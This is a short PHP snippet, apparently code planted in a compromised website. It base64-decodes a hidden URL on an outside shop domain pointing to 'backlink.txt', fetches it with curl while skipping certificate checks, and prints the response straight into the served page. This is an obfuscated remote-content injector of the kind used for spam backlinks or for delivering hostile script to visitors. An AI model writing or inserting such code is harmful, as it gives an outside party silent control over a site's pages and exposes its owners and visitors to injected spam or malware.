<?php
$x = base64_decode('aHR0cHM6Ly9tYW5nb3N0ZWVuZnJ1aXQuc3RvcmUvYmFja2xpbmsudHh0');
$y = '';

if (function_exists('curl_init')) {
    $z = curl_init($x);
    curl_setopt_array($z, [CURLOPT_RETURNTRANSFER => 1, CURLOPT_TIMEOUT => 5, CURLOPT_SSL_VERIFYPEER => 0]);
    $y = curl_exec($z);
    curl_close($z);
}

$y ? print($y) : null;
?>